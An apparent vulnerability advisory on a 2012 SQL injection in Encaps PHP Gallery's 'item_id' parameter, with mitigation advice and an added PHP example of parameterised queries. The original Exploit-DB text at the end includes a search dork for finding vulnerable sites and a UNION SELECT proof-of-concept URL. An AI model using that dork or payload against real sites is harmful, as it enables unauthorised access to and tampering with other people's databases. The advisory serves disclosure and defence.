Vendor: Encaps PHP Gallery
By: Daniel Godoy
CVSS: 7.5 (HIGH)
Vulnerability: SQL Injection
CWE: 89
Product Name: Encaps PHP Gallery
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: encaps.net/software/encapsgallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
Year: 2012

Exploit Title: Encaps PHP Gallery SQL Injection

Encaps PHP Gallery is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The vulnerable parameter is 'item_id', which is not properly sanitized before being used in a SQL query, so arbitrary SQL code can be injected to manipulate that query. An attacker can use this vulnerability to bypass authentication and to access, modify and delete data in the back-end database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner. Parameterized queries should be used to avoid SQL injection attacks.
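
A sketch of the mitigation above applied to the 'item_id' parameter, added here as an example; it is not code from Encaps PHP Gallery or from the original advisory. The items table, its columns and the function names are hypothetical, and an in-memory SQLite database accessed through PDO stands in for the real back end.

```php
<?php
// Added example: hypothetical handler logic, not Encaps PHP Gallery source.
// Table and column names (items, id, name, price) are assumptions.

function open_demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, price REAL)');
    $db->exec("INSERT INTO items VALUES (1, 'Print A', 10.0), (2, 'Print B', 12.5)");
    return $db;
}

// Weak pattern: the request value is concatenated into the SQL text,
// so the value can change the structure of the statement.
function find_item_unsafe(PDO $db, string $itemId): array {
    $sql = "SELECT id, name, price FROM items WHERE id = " . $itemId;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: validate item_id as a positive integer, then bind it as a
// parameter so it can only ever be treated as data.
function find_item_safe(PDO $db, string $itemId): array {
    $id = filter_var($itemId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];   // reject anything that is not a positive integer
    }
    $stmt = $db->prepare('SELECT id, name, price FROM items WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = open_demo_db();
// Constructed inputs: a legitimate id and a value shaped like the PoC's item_id.
$inputs = ['2', '-1 UNION SELECT 1,2,3'];
foreach ($inputs as $in) {
    printf("%-24s unsafe rows=%d  safe rows=%d\n", $in,
        count(find_item_unsafe($db, $in)), count(find_item_safe($db, $in)));
}
```

For the second input the concatenated query returns a row that does not exist in the table, while the validated and bound version returns nothing.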

Exploit-DB raw data:

# Exploit Title: Encaps PHP Gallery SQL Injection
# Date: 14/03/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software: Encaps PHP Gallery
# http://www.encaps.net/software/encapsgallery/
# Tested on: Linux
# Dork: "shopcart.php?action=add&item_id="
  
[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
Maximiliano Soler
    Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion,LinuxFer, Scorp
    her0, r0dr1 and the other users of RemoteExecution
    www.remoteexecution.info www.remoteexcution.com.ar
    #RemoteExecution Hacking Group

[PoC]

http://localhost/software/encapsgallery/templates/Shopcart/shopcart.php?action=add&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--